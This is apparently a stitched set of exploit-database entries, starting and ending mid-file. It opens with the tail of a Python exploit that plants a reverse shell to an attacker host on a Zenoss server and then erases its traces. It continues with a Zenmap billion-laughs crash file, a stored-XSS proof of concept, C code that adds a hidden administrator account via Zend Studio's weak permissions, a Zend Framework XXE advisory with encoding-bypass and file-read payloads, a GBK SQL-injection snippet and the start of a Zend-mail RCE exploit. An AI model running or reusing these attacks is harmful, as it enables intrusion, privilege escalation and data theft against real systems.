print "[-] Error: Adding command to Zenoss failed"
sys.exit(1)
# Wait for command to be saved
wait = 5
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)
# Edit command to drop a python reverse shell request in /tmp/
if verbose: print "[*] Updating command with payload"
postdata = "zenScreenName=editEventCommand.pt&enabled%3Aboolean=True&defaultTimeout%3Aint=60&delay%3Aint=1&repeatTime%3Aint=15&command=echo+%22import+socket%2Csubprocess%2Cos%3Bhost%3D%5C%22"+LHOST+"%5C%22%3Bport%3D"+str(LPORT)+"%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28host%2Cport%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3B+os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fsh%5C%22%2C%5C%22-i%5C%22%5D%29%3B%22+%3E+%2Ftmp%2F"+filename+".py%20%26%26%20chmod%20%2bx%20%2Ftmp%2F"+filename+".py%20%26%26%20python%20%2Ftmp%2F"+filename+".py&clearCommand=&add_filter=&manage_editEventCommand%3Amethod=+Save+"
request = "POST /zport/dmd/ZenEventManager/commands/"+filename+"?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(postdata))+"\r\n\r\n"+postdata
try:
# send request
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
# get zope cookie
m = re.search('(_ZopeId=".+";)', data)
if not m: raise Exception("[-] Error: Could not retrieve _ZopeId cookie value")
else:
zope_cookie = str(m.group(1))
print "[+] Sent payload successfully"
except:
print "[-] Error: Sending payload failed"
sys.exit(1)
# Wait for command to be saved
wait = 5
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)
# Send trigger event and get event id
if verbose: print "[*] Sending trigger event"
postdata = '{"action":"EventsRouter","method":"add_event","data":[{"summary":"'+filename+'","device":"'+filename+'","component":"'+filename+'","severity":"Info","evclasskey":"","evclass":""}],"type":"rpc","tid":0}'
request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
try:
# send request
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
# get trigger event id "evid"
m = re.search('"evid": "(.+)"', data)
evid = ""
if not m: raise Exception("[-] Error: Sending trigger event failed")
else:
evid = str(m.group(1))
print "[+] Sent trigger event successfully"
except:
print "[-] Error: Sending trigger event failed"
# Wait for command to execute
wait = 60
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)
# Delete trigger from web interface
if verbose: print "[*] Deleting the trigger"
postdata = '{"action":"EventsRouter","method":"close","data":[{"evids":["'+evid+'"],"excludeIds":{},"selectState":null,"field":"component","direction":"ASC","params":"{\\"severity\\":[5,4,3,2],\\"eventState\\":[0,1]}","asof":0}],"type":"rpc","tid":0}'
request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
try:
# send request
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
print "[+] Deleted trigger successfully"
except:
print "[-] Error: Deleting trigger failed"
# Delete command from web interface
if verbose: print "[*] Deleting the command from Zenoss"
request = "GET /zport/dmd/ZenEventManager?zenScreenName=listEventCommands&redirect=false&ids%3Alist="+filename+"&id=&manage_deleteCommands%3Amethod=Delete&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
s.sendto(request, (RHOST, RPORT))
data = s.recv(1024)
if verbose: print str(data)+"\r\n"
print "[+] Deleted command from Zenoss successfully"
except:
print "[-] Error: Deleting command failed"
print "[+] You should now have a reverse shell at "+LHOST+":"+str(LPORT)
print "[+] Don't forget to delete /tmp/"+filename+".py"
# Exploit Title: Nmap 7.70 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-10
# Software Link: https://nmap.org/dist/nmap-7.70-setup.exe
# Tested Version: 7.70 (ZenMap)
# Tested on OS: Windows 7 32bit
# Description: This vunerability causes the program to crash and start to heavily consume
# system resources. Do not test on critical systems, can cause system crash.
# Steps to reproduce:
# 1. Create a file in Notepad with the following and save it as "test.xml":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
<!ENTITY lol16 "&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;">
<!ENTITY lol17 "&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;">
<!ENTITY lol18 "&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;">
<!ENTITY lol19 "&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;">
<!ENTITY lol20 "&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;">
<!ENTITY lol21 "&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;">
<!ENTITY lol22 "&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;">
<!ENTITY lol23 "&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;">
<!ENTITY lol24 "&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;">
<!ENTITY lol25 "&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;">
<!ENTITY lol26 "&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;">
<!ENTITY lol27 "&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;">
<!ENTITY lol28 "&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;">
<!ENTITY lol29 "&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;">
<!ENTITY lol30 "&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;">
]>
<lolz>&lol30;</lolz>
# 2. Open Zenmap > Scan > Open Scan > "test.xml"
# 3. Crash
# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows
# Software description:
# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
# your trigger or automation. Customize the landing pages for each of your brands.
# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.
# POC
1. Open Support ticket in Zendesk and send XSS payload e.g;
<script>alert(1);</script>
2. Generate survey request to rate the ticket and payload will execute;
# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
============
www.zend.com
Product:
======================
ZendStudio IDE v13.5.1
Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile development with PHP and includes a sample mobile
app with source code.
Vulnerability Type:
=====================
Privilege Escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
ZendStudio IDE uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
on the affected system.
"Everyone" encompasses all users who have logged in with a password as well as built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE.
Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code or
replace the ZendStudio executable and have it run in the context of the system.
e.g.
c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe
ZendStudio.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
x86_64 version ...
c:\Program Files\Zend>icacls * | more
Zend Studio 13.5.1 Everyone:(F)
Everyone:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(I
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Exploit code(s):
===============
1) Compile below 'C' code name it as "ZendStudio.exe"
#include<windows.h>
int main(void){
system("net user hacker abc123 /add");
system("net localgroup Administrators hacker /add");
system("net share SHARE_NAME=c:\ /grant:hacker,full");
WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 13.5.1\\~ZendStudio.exe",0);
return 0;
}
2) Rename original "ZendStudio.exe" to "~ZendStudio.exe"
3) Place our malicious "ZendStudio.exe" in the ZendStudio directory
4) Logout and wait for a more privileged user to login and use ZendStudio IDE then BOOM!!!!! later,
go back and login with your shiny new account.
Disclosure Timeline:
========================================
Vendor Notification: September 30, 2016
October 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
=============================================
- Release date: 12.08.2015
- Discovered by: Dawid Golunski
- Severity: High
- CVE-ID: CVE-2015-5161
=============================================
I. VULNERABILITY
-------------------------
Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM
Zend Framework <= 1.12.13
II. BACKGROUND
-------------------------
- Zend Framework
From http://framework.zend.com/about/ website:
"Zend Framework 2 is an open source framework for developing web applications
and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and
utilises most of the new features of PHP 5.3, namely namespaces, late static
binding, lambda functions and closures.
Zend Framework 2 evolved from Zend Framework 1, a successful PHP framework with
over 15 million downloads."
- PHP FPM
http://php.net/manual/en/install.fpm.php
"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
some additional features (mostly) useful for heavy-loaded sites."
Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI
process manager into its codebase. However PHP-FPM was available earlier as a
separate project (http://php-fpm.org/).
III. INTRODUCTION
-------------------------
The XML standard defines a concept of external entites.
XXE (XML eXternal Entity) attack is an attack on an application that parses XML
input from untrusted sources using incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (for example, when an 'expect' PHP module is installed) lead to
command execution.
An independent security reserach of Zend Framework revealed that it is
possible to bypass XXE security controls within the framework in case
the PHP application using Zend XML related classes (e.g Zend_XmlRpc_Server,
Zend_Feed, Zend_Config_Xml etc.) from Zend Framework is served via PHP FPM.
Bypassing the controls may allow XXE attacks and lead to the aforementioned
exploitation possibilities on systems where the XML parser is set to resolve
entities.
IV. DESCRIPTION
-------------------------
The security controls within the Zend Framework mitigate the XXE attack vectors
by first calling libxml_disable_entity_loader(), and then looping
through the DOMDocument nodes testing if any is of type: XML_DOCUMENT_TYPE_NODE
If so, an exception is raised and PHP script execution is halted.
These controls have been included in the scan() function of a Zend_Xml_Security
class located in the following paths depending on the code branch of Zend
Framework:
ZendFramework-1.12.13/library/Zend/Xml/Security.php
ZendFramework-2.4.2/library/ZendXml/Security.php
In case of the latest version of ZendFramework-1.12.13,
the relevant code blocks from the scan() function look as follows:
---[library/Zend/Xml/Security.php ]---
public static function scan($xml, DOMDocument $dom = null)
{
if (self::isPhpFpm()) {
self::heuristicScan($xml);
}
if (!self::isPhpFpm()) {
$loadEntities = libxml_disable_entity_loader(true);
$useInternalXmlErrors = libxml_use_internal_errors(true);
}
// Load XML with network access disabled (LIBXML_NONET)
$result = $dom->loadXml($xml, LIBXML_NONET);
restore_error_handler();
if (!self::isPhpFpm()) {
libxml_disable_entity_loader($loadEntities);
libxml_use_internal_errors($useInternalXmlErrors);
}
if (!$result) {
return false;
}
// Scan for potential XEE attacks using ENTITY, if not PHP-FPM
if (!self::isPhpFpm()) {
foreach ($dom->childNodes as $child) {
if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
if ($child->entities->length > 0) {
require_once 'Exception.php';
throw new Zend_Xml_Exception(self::ENTITY_DETECT);
}
}
}
}
if (isset($simpleXml)) {
$result = simplexml_import_dom($dom);
if (!$result instanceof SimpleXMLElement) {
return false;
}
return $result;
}
return $dom;
--------------------------------------
As we can see from the code, the application disables the entity loader
(via libxml_disable_entity_loader), it also disables network access
(LIBXML_NONET), and it additionally scans provided XML for the presence of XML
entities to prevent potential entity expansion attacks.
The code succesfully prevents most XXE attacks.
However, as the PHP libxml_disable_entity_loader() function was reported not
thread safe (the entity loader setting could potentially get overwritten
between hits in FPM processes), Zend Framework does not use it when the
application is hosted in a PHP-FPM environment. Instead, another approach is
taken to prevent the XXE attacks.
In the code above we see the check !self::isPhpFpm() which determines the type
of interface between web server and PHP (through the php_sapi_name() function).
If the SAPI is FPM-CGI (i.e. PHP-FPM) the following heuristicScan function gets
executed:
---[library/Zend/Xml/Security.php ]---
protected static function heuristicScan($xml)
{
if (strpos($xml, '<!ENTITY') !== false) {
require_once 'Exception.php';
throw new Zend_Xml_Exception(self::ENTITY_DETECT);
}
}
--------------------------------------
It validates provided XML by searching for any entity declaration. It throws an
exception if it finds one.
Although this check cannot be bypassed by simply adding spaces or changing
the characters to lower case (an XML parser would reject such declaration
as invalid), this security check is nevertheless insufficient.
XML format allows for different types of encoding to be used, hence it is
possible to bypass the check by supplying specifically encoded XML content.
For example, a UTF-16 encoding which uses 2-byte characters would be enough to
bypass the ENTITY string check.
Apart from the ENTITY check, the code also adds the aformentioned LIBXML_NONET
parameter to catch entities refering to network resources.
This limitation can also be bypassed as shown in the proof of concept exploit.
This makes the Zend Framework vulnerable to XXE injection attacks.
V. PROOF OF CONCEPT
-------------------------
Below is a simple PHP application using Zend Framework to implement an XML-RPC
server for demonstation:
---[ zend_xmlrpc_server.php ]--
<?php
// Simple XML-RPC SERVER
function helloworld() {
$text = "Hello world! This request was executed via ".php_sapi_name().".";
return $text;
}
set_include_path("./ZendFramework-1.12.13/library/");
require_once("./ZendFramework-1.12.13/library/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
$server = new Zend_XmlRpc_Server();
$server->addFunction('helloworld');
echo $server->handle();
?>
-------------------------------
This test application is hosted on an Apache server with PHP-FPM.
Requesting:
POST /zend_poc/zend-xmlrpc-server.php HTTP/1.1
Host: apache-php-fpm
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>helloworld</methodName>
</methodCall>
should return:
<methodResponse><params><param><value><string>Hello world!
This request was executed via fpm-fcgi.</string></value></param></params>
</methodResponse>
In order to exploit the XXE vulnerability contained in the Zend framework
an attacker can pass XML data containing external entities similar to:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE methodCall [
<!ENTITY pocdata SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>retrieved: &pocdata;</methodName>
</methodCall>
Feeding the above data to the zend-xmlrpc-server.php script will result in
an error:
<int>631</int></value></member><member><name>faultString</name><value>
<string>Failed to parse request</string></value></member></struct></value>
</fault></methodResponse>
which is due to the heuristicScan ENTITy detection.
We can now encode the data to avoid the check.
$ cat poc-utf8.xml | sed 's/UTF-8/UTF-16/' \
| iconv -f UTF-8 -t UTF-16 >poc-utf16.xml
Hex representation of the UTF-16 encoded XML file (including the change in
the xml header to reflect the new encoding) looks as follows:
$ hexdump -C poc-utf16.xml
00000000 ff fe 3c 00 3f 00 78 00 6d 00 6c 00 20 00 76 00 |..<.?.x.m.l. .v.|
00000010 65 00 72 00 73 00 69 00 6f 00 6e 00 3d 00 22 00 |e.r.s.i.o.n.=.".|
00000020 31 00 2e 00 30 00 22 00 20 00 65 00 6e 00 63 00 |1...0.". .e.n.c.|
00000030 6f 00 64 00 69 00 6e 00 67 00 3d 00 22 00 55 00 |o.d.i.n.g.=.".U.|
00000040 54 00 46 00 2d 00 38 00 22 00 3f 00 3e 00 0a 00 |T.F.-.8.".?.>...|
00000050 3c 00 21 00 44 00 4f 00 43 00 54 00 59 00 50 00 |<.!.D.O.C.T.Y.P.|
00000060 45 00 20 00 6d 00 65 00 74 00 68 00 6f 00 64 00 |E. .m.e.t.h.o.d.|
00000070 43 00 61 00 6c 00 6c 00 20 00 5b 00 0a 00 20 00 |C.a.l.l. .[... .|
00000080 20 00 3c 00 21 00 45 00 4e 00 54 00 49 00 54 00 | .<.!.E.N.T.I.T.|
00000090 59 00 20 00 70 00 6f 00 63 00 64 00 61 00 74 00 |Y. .p.o.c.d.a.t.|
000000a0 61 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 |a. .S.Y.S.T.E.M.|
000000b0 20 00 22 00 66 00 69 00 6c 00 65 00 3a 00 2f 00 | .".f.i.l.e.:./.|
000000c0 2f 00 2f 00 65 00 74 00 63 00 2f 00 70 00 61 00 |/./.e.t.c./.p.a.|
000000d0 73 00 73 00 77 00 64 00 22 00 3e 00 0a 00 5d 00 |s.s.w.d.".>...].|
000000e0 3e 00 0a 00 3c 00 6d 00 65 00 74 00 68 00 6f 00 |>...<.m.e.t.h.o.|
000000f0 64 00 43 00 61 00 6c 00 6c 00 3e 00 0a 00 20 00 |d.C.a.l.l.>... .|
00000100 20 00 3c 00 6d 00 65 00 74 00 68 00 6f 00 64 00 | .<.m.e.t.h.o.d.|
00000110 4e 00 61 00 6d 00 65 00 3e 00 72 00 65 00 74 00 |N.a.m.e.>.r.e.t.|
00000120 72 00 69 00 65 00 76 00 65 00 64 00 3a 00 20 00 |r.i.e.v.e.d.:. .|
00000130 26 00 70 00 6f 00 63 00 64 00 61 00 74 00 61 00 |&.p.o.c.d.a.t.a.|
00000140 3b 00 3c 00 2f 00 6d 00 65 00 74 00 68 00 6f 00 |;.<./.m.e.t.h.o.|
00000150 64 00 4e 00 61 00 6d 00 65 00 3e 00 0a 00 3c 00 |d.N.a.m.e.>...<.|
00000160 2f 00 6d 00 65 00 74 00 68 00 6f 00 64 00 43 00 |/.m.e.t.h.o.d.C.|
00000170 61 00 6c 00 6c 00 3e 00 0a 00 |a.l.l.>...|
As can be seen on the hexdump, the ENTITY word is encoded using 2-byte
characters.
Resupplying the encoded data contained in poc-utf16.xml to the Zend XMLRPC
application, depending on the underlying libxml library, may result in a
password file retrival from the remote server:
$ wget -q -O /dev/stdout http://apache-phpfpm/zend_poc/zend-xmlrpc-server.php \
--post-file=poc-utf16.xml
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value>
<int>620</int></value></member><member><name>faultString</name><value><string>
Method "retrieved: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[cut]
" does not exist</string></value></member></struct></value></fault>
</methodResponse>
If the password file is not returned, an attacker may try another version
of an XXE attack using parameter entities and an out-of-band communication.
Both of these can be used to exploit the vulnerability in Zend Framework on
a greater number of libxml configurations.
Remote command execution may also be possible if the remote system has an
'expect' php module (libexpect-php) installed.
If this is the case, we can for example execute 'id' command via injecting
the entity:
<!ENTITY pocdata SYSTEM "expect://id">
which should return a result similar to:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value>
<int>620</int></value></member><member><name>faultString</name><value>
<string>Method "retrieved: uid=33(www-data) gid=33(www-data)
groups=33(www-data) " does not exist</string></value></member>
A separate POC exploit (zend-xmlrpc-exploit-cmd-exec.sh) is included which
runs commands with parameters and also implements parameter entities/OOB
communication.
As mentioned in the description of this vulnerability, the Zend Framework
adds a LIBXML_NONET flag to the loadXML() call in order to prevent reaching
network resources through XXE.
As a result, requesting a network resource such as http://192.168.57.10 via XXE
injection will fail.
This can be bypassed by using php://filter wrapper inside an entity, e.g:
<!ENTITY pocdata SYSTEM "php://filter/read=convert.base64-encode/
resource=http://192.168.57.10">
This will return a base64 encoded response from the remote server bypassing
the LIBXML_NONET restriction:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int>
</value></member><member><name>faultString</name><value><string>Method "
retrieved: PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hb
C8vRU4iPgo8aHRtbD4KIDxoZWFkPgogIDx0aXRsZT5JbmRleCBvZiAvPC90aXRsZT4KIDwvaGVhZ
D4KIDxib2R5Pgo8aDE+SW5kZXggb2YgLzwvaDE+CiAgPHRhYmxlPgogICA8dHI+PHRoIHZhbGlnb
j0idG9wIj48aW1nIHNyYz0iL2ljb[cut]
This vulnerability may also lead to Denial of Service if for example the attacker
requests /dev/random file through XXE. This will cause the application to block
on the endless input from the random generator pseudo device, until the maximum
execution time is reached.
Sending multiple requests of such kind would exhaust the maximum number of
threads that the web server can create.
VI. BUSINESS IMPACT
-------------------------
An unauthenticated remote exploitation may be possible on applications which
make use of Zend_XmlRpc_Server with a public XML-RPC endpoint as demonstrated
in this advisory.
Authentication in case of XML-RPC is not required for exploitation
as the XML needs to be processed first in order for the application to read
the credentials passed from the login data within the xml-formatted input.
This issue should be marked as high/critical due to the wide deployment of Zend
Framework (which includes some major CMS and e-commerce applications), the
number of Zend XML classes affected, low complexity of exploitation, as well
as a possibility of an unauthenticated remote exploitation.
There is also a growing number of servers set up to serve PHP code with PHP-FPM,
especially in web hosting environments which need to respond to heavy load.
VII. SYSTEMS AFFECTED
-------------------------
All systems making use of Zend Framework in versions starting from
1.12.4 and 2.1.6 up to the latest versions of Zend Framework 1.12.13 (released
2015-05-20) and 2.4.2 (released 2015-05-11) contain the XXE injection
vulnerability described in this advisory.
All Zend Framework classes making use of XML and calling the vulnerable
Zend_Xml_Security::scan() function are affected by this issue:
Zend/Amf/Parse/Amf0/Deserializer.php
Zend/Amf/Parse/Amf3/Deserializer.php
Zend/Config/Xml.php
Zend/Dom/Query.php
Zend/Feed/Abstract.php
Zend/Feed/Entry/Abstract.php
Zend/Feed/Entry/Atom.php
Zend/Feed.php
Zend/Feed/Reader.php
Zend/Feed/Writer/Renderer/Entry/Atom.php
Zend/Gdata/App/Base.php
Zend/Gdata/App.php
Zend/Gdata/Gapps/ServiceException.php
Zend/Gdata/YouTube.php
Zend/Json.php
Zend/Mobile/Push/Message/Mpns/Raw.php
Zend/Rest/Client/Result.php
Zend/Search/Lucene/Document/Docx.php
Zend/Search/Lucene/Document/OpenXml.php
Zend/Search/Lucene/Document/Pptx.php
Zend/Search/Lucene/Document/Xlsx.php
Zend/Serializer/Adapter/Wddx.php
Zend/Service/Amazon/Ec2/Response.php
Zend/Service/Amazon.php
Zend/Service/Amazon/SimpleDb/Response.php
Zend/Service/Audioscrobbler.php
Zend/Service/Delicious.php
Zend/Service/Ebay/Finding.php
Zend/Service/Flickr.php
Zend/Service/SlideShare.php
Zend/Service/SqlAzure/Management/Client.php
Zend/Service/Technorati.php
Zend/Service/WindowsAzure/Diagnostics/ConfigurationInstance.php
Zend/Service/WindowsAzure/Management/Client.php
Zend/Service/WindowsAzure/Storage.php
Zend/Service/Yahoo.php
Zend/Soap/Server.php
Zend/Soap/Wsdl.php
Zend/XmlRpc/Request.php
Zend/XmlRpc/Response.php
The vulnerability can be exploited in applications using vulnerable version
of the framework, where PHP code is served with PHP-FPM, and when the xml parser
installed in the system is set up to resolves entities.
PHP-FPM can be set up on popular web servers such as Apache, or Nginx
on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup
guides available on the Internet).
VIII. SOLUTION
-------------------------
Install the latest version of Zend Framework containing the patch for this
vulnerability.
IX. REFERENCES
-------------------------
http://legalhackers.com/
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
http://framework.zend.com/blog/zend-framework-2-5-0-released.html
http://framework.zend.com/security/advisory/ZF2015-06
http://www.securiteam.com/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5161
X. DISCOVERED BY
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Aug 12th, 2015: Final version
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
source: https://www.securityfocus.com/bid/47919/info
Zend Framework is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable.
$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());
<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
